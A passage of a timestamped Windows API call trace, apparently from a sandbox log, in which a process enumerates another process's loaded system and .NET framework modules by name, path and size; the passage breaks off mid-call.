1 [0142.308] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.308] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0142.308] CoTaskMemFree (pv=0x55ab38) [0142.308] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.308] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0142.309] CoTaskMemFree (pv=0x55ab38) [0142.309] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x2518ac4, cb=0xc | out: lpmodinfo=0x2518ac4*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0142.309] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.309] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0142.310] CoTaskMemFree (pv=0x55ab38) [0142.310] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.310] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0142.310] CoTaskMemFree (pv=0x55ab38) [0142.310] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x251abf0, cb=0xc | out: lpmodinfo=0x251abf0*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0142.311] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.311] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0142.313] CoTaskMemFree (pv=0x55ab38) [0142.313] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.313] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0142.314] CoTaskMemFree (pv=0x55ab38) [0142.314] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x251ccfc, cb=0xc | out: lpmodinfo=0x251ccfc*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0142.315] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.315] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0142.315] CoTaskMemFree (pv=0x55ab38) [0142.315] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.315] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0142.316] CoTaskMemFree (pv=0x55ab38) [0142.316] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x251ee2c, cb=0xc | out: lpmodinfo=0x251ee2c*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0142.316] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.316] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0142.317] CoTaskMemFree (pv=0x55ab38) [0142.317] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.317] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0142.318] CoTaskMemFree (pv=0x55ab38) [0142.318] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x2520f60, cb=0xc | out: lpmodinfo=0x2520f60*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0142.318] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.318] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0142.319] CoTaskMemFree (pv=0x55ab38) [0142.320] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.320] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0142.320] CoTaskMemFree (pv=0x55ab38) [0142.320] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x2523108, cb=0xc | out: lpmodinfo=0x2523108*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0142.321] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.321] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0142.322] CoTaskMemFree (pv=0x55ab38) [0142.322] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.322] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0142.324] CoTaskMemFree (pv=0x55ab38) [0142.324] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x252520c, cb=0xc | out: lpmodinfo=0x252520c*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0142.324] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.324] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0142.325] CoTaskMemFree (pv=0x55ab38) [0142.325] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.325] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0142.326] CoTaskMemFree (pv=0x55ab38) [0142.326] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x2527318, cb=0xc | out: lpmodinfo=0x2527318*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0142.327] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.327] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0142.327] CoTaskMemFree (pv=0x55ab38) [0142.327] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.328] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0142.328] CoTaskMemFree (pv=0x55ab38) [0142.328] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x2529458, cb=0xc | out: lpmodinfo=0x2529458*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0142.329] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.329] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0142.330] CoTaskMemFree (pv=0x55ab38) [0142.330] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.330] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0142.331] CoTaskMemFree (pv=0x55ab38) [0142.331] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x252b56c, cb=0xc | out: lpmodinfo=0x252b56c*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0142.332] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.332] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0142.333] CoTaskMemFree (pv=0x55ab38) [0142.333] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.333] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0142.334] CoTaskMemFree (pv=0x55ab38) [0142.334] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x252d708, cb=0xc | out: lpmodinfo=0x252d708*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0142.334] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.334] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0142.335] CoTaskMemFree (pv=0x55ab38) [0142.335] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.336] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0142.336] CoTaskMemFree (pv=0x55ab38) [0142.336] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x252f8d4, cb=0xc | out: lpmodinfo=0x252f8d4*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0142.337] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.337] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0142.340] CoTaskMemFree (pv=0x55ab38) [0142.341] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.341] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0142.341] CoTaskMemFree (pv=0x55ab38) [0142.341] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x2531ac4, cb=0xc | out: lpmodinfo=0x2531ac4*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0142.343] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.343] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.343] CoTaskMemFree (pv=0x55ab38) [0142.343] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.343] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0142.344] CoTaskMemFree (pv=0x55ab38) [0142.344] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x2533c88, cb=0xc | out: lpmodinfo=0x2533c88*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0142.345] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.345] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.346] CoTaskMemFree (pv=0x55ab38) [0142.346] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.346] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0142.347] CoTaskMemFree (pv=0x55ab38) [0142.347] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x2535f54, cb=0xc | out: lpmodinfo=0x2535f54*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0142.347] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.347] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0142.348] CoTaskMemFree (pv=0x55ab38) [0142.348] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.348] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0142.349] CoTaskMemFree (pv=0x55ab38) [0142.349] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x2538060, cb=0xc | out: lpmodinfo=0x2538060*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0142.350] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.350] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0142.351] CoTaskMemFree (pv=0x55ab38) [0142.351] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.351] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0142.352] CoTaskMemFree (pv=0x55ab38) [0142.352] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x253a21c, cb=0xc | out: lpmodinfo=0x253a21c*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0142.352] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.352] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0142.354] CoTaskMemFree (pv=0x55ab38) [0142.354] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.354] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0142.355] CoTaskMemFree (pv=0x55ab38) [0142.355] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x253c40c, cb=0xc | out: lpmodinfo=0x253c40c*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0142.356] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.356] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0142.356] CoTaskMemFree (pv=0x55ab38) [0142.356] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.356] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0142.357] CoTaskMemFree (pv=0x55ab38) [0142.357] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x253e5c0, cb=0xc | out: lpmodinfo=0x253e5c0*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0142.358] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.358] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0142.359] CoTaskMemFree (pv=0x55ab38) [0142.359] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.359] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0142.360] CoTaskMemFree (pv=0x55ab38) [0142.360] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x25406c4, cb=0xc | out: lpmodinfo=0x25406c4*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0142.361] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.361] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0142.362] CoTaskMemFree (pv=0x55ab38) [0142.362] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.362] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0142.363] CoTaskMemFree (pv=0x55ab38) [0142.363] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x25427d8, cb=0xc | out: lpmodinfo=0x25427d8*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0142.364] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.364] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0142.365] CoTaskMemFree (pv=0x55ab38) [0142.365] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.365] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0142.366] CoTaskMemFree (pv=0x55ab38) [0142.366] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x25448e4, cb=0xc | out: lpmodinfo=0x25448e4*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0142.367] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.367] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0142.368] CoTaskMemFree (pv=0x55ab38) [0142.368] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.368] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0142.369] CoTaskMemFree (pv=0x55ab38) [0142.369] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x25469f0, cb=0xc | out: lpmodinfo=0x25469f0*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0142.372] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.372] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0142.373] CoTaskMemFree (pv=0x55ab38) [0142.373] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.373] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0142.374] CoTaskMemFree (pv=0x55ab38) [0142.374] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x2548afc, cb=0xc | out: lpmodinfo=0x2548afc*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0142.375] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.375] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0142.375] CoTaskMemFree (pv=0x55ab38) [0142.376] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.376] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0142.376] CoTaskMemFree (pv=0x55ab38) [0142.376] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x254ac08, cb=0xc | out: lpmodinfo=0x254ac08*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0142.377] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.377] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0142.378] CoTaskMemFree (pv=0x55ab38) [0142.378] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.378] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0142.379] CoTaskMemFree (pv=0x55ab38) [0142.379] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x254cd14, cb=0xc | out: lpmodinfo=0x254cd14*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0142.380] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.380] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0142.381] CoTaskMemFree (pv=0x55ab38) [0142.381] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.381] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0142.382] CoTaskMemFree (pv=0x55ab38) [0142.382] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x254ee60, cb=0xc | out: lpmodinfo=0x254ee60*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0142.383] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.383] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0142.384] CoTaskMemFree (pv=0x55ab38) [0142.384] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.384] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0142.386] CoTaskMemFree (pv=0x55ab38) [0142.386] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x2550f74, cb=0xc | out: lpmodinfo=0x2550f74*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0142.387] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.387] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0142.388] CoTaskMemFree (pv=0x55ab38) [0142.389] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.389] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0142.390] CoTaskMemFree (pv=0x55ab38) [0142.390] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x2553070, cb=0xc | out: lpmodinfo=0x2553070*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0142.391] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.391] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0142.392] CoTaskMemFree (pv=0x55ab38) [0142.392] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.392] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55ab38, 